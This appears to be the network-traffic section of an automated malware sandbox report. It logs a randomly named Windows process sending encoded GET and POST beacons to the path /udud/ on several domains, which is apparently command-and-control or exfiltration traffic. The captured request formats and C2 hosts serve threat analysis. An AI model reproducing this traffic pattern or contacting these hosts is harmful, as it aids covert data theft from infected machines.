                                                                                                May 27, 2024 12:33:12.590385914 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:12 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                28 | 192.168.11.30 | 49858 | 3.64.163.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:15.123573065 CEST | 479 | OUT | GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:33:15.308109999 CEST | 292 | IN | HTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:15 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                29 | 192.168.11.30 | 49859 | 217.70.184.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:29.346239090 CEST | 739 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.avocatmh.org
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.avocatmh.org
                                                                                                Referer: http://www.avocatmh.org/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=PGRa6C14X/KGmCA3aKkq86rZVuQmsUE64iHHlII4Im8zs/nfuYJQHAb3wP0zwgJZ6ahcYp06M87/JWRxgoLbHq9blCUPkU8K4N9I7ic+3EigwCsj7IVnL3H5U7LDe7ysYwIr4tZ8bTaD6UbwogGoKsY6PBU/8h9HvqQPb8eZ7FHs0a0r71RrvED9eFnH3TgfdA==
                                                                                                May 27, 2024 12:33:29.524604082 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:33:29 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                30 | 192.168.11.30 | 49860 | 217.70.184.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:32.048609018 CEST | 759 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.avocatmh.org
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.avocatmh.org
                                                                                                Referer: http://www.avocatmh.org/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=PGRa6C14X/KGmjQ3YoMq06reaOQmi0E+4iLHlJ9/LVUzsajftdlQOQb34v0y9AJH6bchYok6M/H/JXhxgZLYVq9ZpiUNgU8K4N9I7iJR3E6gwScj6qxgGXH4DLLDa7ySYwJM4o40bRiD6VrwshGnfcYwBhUv2D8zvu8CVcSXzw7g4tFxm2lp8k/QCEKv1RhEAOhQqGJ2xiYREEfK14Z4xks=
                                                                                                May 27, 2024 12:33:32.226687908 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:33:32 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                31 | 192.168.11.30 | 49861 | 217.70.184.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:34.753829002 CEST | 1676 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.avocatmh.org
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.avocatmh.org
                                                                                                Referer: http://www.avocatmh.org/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX= [TRUNCATED]
                                                                                                May 27, 2024 12:33:34.932465076 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:33:34 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                32 | 192.168.11.30 | 49862 | 217.70.184.50 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:37.453708887 CEST | 477 | OUT | GET /udud/?Pl9P8ldX=CE5650FDbfXnpQA/eK0NgrbRbNtPjFAUxQ7joq83O2JD2van08dDJXT7jPsZwBcB76Ina7ciMfrueGFKvr7HGptlhVNK1F0UnKlYvzZl0mKZiEoX7KROJkU=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.avocatmh.org
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:33:37.632857084 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:33:37 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Vary: Accept-Language
                                                                                                Data Ascii: 77f<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>avocatmh.org</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://who [TRUNCATED]
                                                                                                May 27, 2024 12:33:37.632949114 CEST | 826 | IN | Data Raw: 6f 72 67 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c
                                                                                                Data Ascii: org</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span class="Parking_2023-infobox_DMd
                                                                                                May 27, 2024 12:33:37.632960081 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                33 | 192.168.11.30 | 49863 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:42.997051001 CEST | 727 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.lm2ue.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.lm2ue.us
                                                                                                Referer: http://www.lm2ue.us/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=5dGN3LGIc0C7hFh8PpJd3i9as3K4IAq0E1INOSMhB0NCP0TsHN8GxfUhh2Tsp6lOKfMoeDx4KWjVjycd2QZoSC2KJ0Azca61v9hGH7ccRnDUhg4sX0+VZl2ybO2krFopRIuVFtXcbNrIzguXKiGyq66VWugNLHngALjLAJGYFUKbknbRJEx/p1otgnHrSN5tRA==
                                                                                                May 27, 2024 12:33:43.188915968 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:33:43 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                34 | 192.168.11.30 | 49864 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:45.715686083 CEST | 747 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.lm2ue.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.lm2ue.us
                                                                                                Referer: http://www.lm2ue.us/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=5dGN3LGIc0C7uER8AqxdiS9dwnK4aAqwE1MNOXt6BBdCOWbsGIAGyfUhuWTpnalVKfIaeCN4KW3VjyMdjzw+QS2UCUAxBK61v9hGH7I2RnbUgQIsWV+UH12zYO2kvFoXRIujFo2LbL3IzheXETG1l66XJeh8GH2fAIq8NJjLNUP+oQqLUHF96VUA8mqDQP42MDhkA2LQVfs/Ga2pCiOHsZ8=
                                                                                                May 27, 2024 12:33:46.057009935 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:33:45 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                35 | 192.168.11.30 | 49865 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:48.436600924 CEST | 1664 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.lm2ue.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.lm2ue.us
                                                                                                Referer: http://www.lm2ue.us/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=5dGN3LGIc0C7uER8AqxdiS9dwnK4aAqwE1MNOXt6BBVCOjPsHroGzfUhwmTonakVKbdReCAaKVPVgRUdnyw+aS2UN0Awca6gv5EBH7Y2RnbUgWksT0+UF12ybO2orFosRI2zFo72b9HIzCmXGhu16K6RIehkGH6+AIHFNJWWNUH+rkvfPElfv2YzziSFRZphFSRfP1b0V8VUAcCBZhi87fEqeE6MsvYlHXLKYLXVexG0pw/3WX5U82jqGFBmpa6pVYH0TizWiCr2gSdW/UIb33hqFwxGYkqZLt87/gLbzUw6EA0cj8SzmdUGSbFQSpGqm7+uYuP2F9sSE/85oABcKwcSQpnK0fPxhi91SlDcmrAdekr2AxC9feHk43xC699UisqvRcXFk3GidtETzgMMTKv+l9Zl25z2eXNSHGy7Jk0MKbi+znKd5LnUM7pLcqKlNcB+pDqQQlyLk9WKE4gqU8vMR06llVHueziYkgp2n+s0c7dfac5saqoVlGN0CqLH1Ld9yiixHfnTgs5Lr9yTOOrLlPvfI2Y4N+2DRQYVv/pR865STOrpG4Jm/DmkI+JgzwhNXJSTeAprpMgtdG+1hG4nDVRereO9nYmziVQicG5JXlL6vqBg5i01HQ1xFjIu4Qp67neF6jb5eqq42zzeIUiZKdr8FqS/kGKrMkMq4wA4KsgeiJkM4lrpgRRBImmx7lGdwetNT8+UGSyTu3BVe5tGnr4i+Dp2/xoPyal3jrgjm9iqYPSNJFffWxnkHDe8efFDTKTDwkzRGKyxqLbtgqvACohkTWBE896zUjK2Qy4mdnyIIUJc+eNvrNDBp6YvEev0X7A6Muy5OoPJ6sfz/SsPz7mZ8rIVfObgOgtVPMklW3iDieLJss9rqoz5mmwsq5DMeNHFNBOuF0DpNgs/HIwAFkf2Iq3qJnd358NoOOT8rFFVbPQkNUCOmW1mA53EBEK6UcNagDwOK6c3Mc4gYHF5g3ll7kRIFoPtt/LRZXi [TRUNCATED]
                                                                                                May 27, 2024 12:33:48.627268076 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:33:48 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                36 | 192.168.11.30 | 49866 | 91.195.240.123 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:33:51.153017044 CEST | 473 | OUT | GET /udud/?Pl9P8ldX=0fut0+GuUFbft3VBL5xm0Hp90TDKfhipdS4VXGxzAEleMWehH5gQwP182GbMnYpRKYVXdyZjU035jwIjvCFAGk2/B20KDJmRwuIeT4QhTHXMvWA5X1/HJWk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.lm2ue.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:33:51.404592037 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:33:51 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_w6j8DONnSgvrxKYmcBlJlV3z7JyNe9iQk+ZDyTSWUu7+o1DhXheYjnTPI4l6r6OruPL3Bv5PjHhXemcv7swS2A==
                                                                                                last-modified: Mon, 27 May 2024 10:33:51 GMT
                                                                                                x-cache-miss-from: parking-6cfd44ff49-ljb5v
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_w6j8DONnSgvrxKYmcBlJlV3z7JyNe9iQk+ZDyTSWUu7+o1DhXheYjnTPI4l6r6OruPL3Bv5PjHhXemcv7swS2A==><head><meta charset="utf-8"><title>lm2ue.us&nbsp;-&nbsp;lm2ue Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="lm2ue.us is your first and best source for all of the information youre looking for. From general topics to more
May 27, 2024 12:33:51.404670000 CEST | 1289 | IN |
                                                                                                Data Ascii: of what you would expect to find here, lm2ue.us has it all. We hope you find what you are searching for!576"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style>
May 27, 2024 12:33:51.404721975 CEST | 1289 | IN |
                                                                                                Data Ascii: ,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}but595ton::-moz-focus-
May 27, 2024 12:33:51.404799938 CEST | 1289 | IN |
                                                                                                Data Ascii: enter;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-bu
May 27, 2024 12:33:51.404867887 CEST | 479 | IN |
                                                                                                Data Ascii: nt__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.con
May 27, 2024 12:33:51.404884100 CEST | 1289 | IN |
                                                                                                Data Ascii: 576#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-al
May 27, 2024 12:33:51.404906034 CEST | 1289 | IN |
                                                                                                Data Ascii: window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:in576line-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;ma
May 27, 2024 12:33:51.404932022 CEST | 1289 | IN |
                                                                                                Data Ascii: :before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}6input:
May 27, 2024 12:33:51.404947042 CEST | 353 | IN |
                                                                                                Data Ascii: kground:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:url("//img.sedoparking.com/
May 27, 2024 12:33:51.404983997 CEST | 1289 | IN |
                                                                                                Data Ascii: 576top:90px;overflow:hidden;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.c
May 27, 2024 12:33:51.594410896 CEST | 1289 | IN |
                                                                                                Data Ascii: t-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.weba576rchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.30 | 49867 | 84.32.84.32 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:33:56.932564974 CEST | 742 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.noispisok.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.noispisok.com
                                                                                                Referer: http://www.noispisok.com/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=l9XrXEYQmtC+UZ90bbi6YlQZKVyMwUfWZ4JW4wg39shhTrOiKaC0oH1sEkYbDPbLj9SAPC52ntW0iIgzAlJxTXvTwB3swAywA83YRtgeL/JlcCAn8U2dQRmzlAHrBdOaJW3oapMQMZ5rjGKl7FfmnvQPNW3RjZyk3mmFfk9eYNF3HrzG3TCU0G6ZyMM91T+PqA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.30 | 49868 | 84.32.84.32 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:33:59.569232941 CEST | 762 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.noispisok.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.noispisok.com
                                                                                                Referer: http://www.noispisok.com/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=l9XrXEYQmtC+V5t0a466ZFQeG1yMiUedZ41W4x0n9fFhQK+iJY60pH1scUYUOvaHj9emPA92nsy0iIwzAWh+RHu12B3uvwywA83YRpwkL7dlczwn612eTRmytgHrFdPyJW3WaoQqMbxrjCOl7XnltvQNA22OuoupxFe5SDJsce1rPcCcqQ2WnmG0uNhV3R/U3FvOFZGSmAgDmZL2S6Ruvh0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.11.30 | 49869 | 84.32.84.32 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:34:02.209757090 CEST | 1679 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.noispisok.com
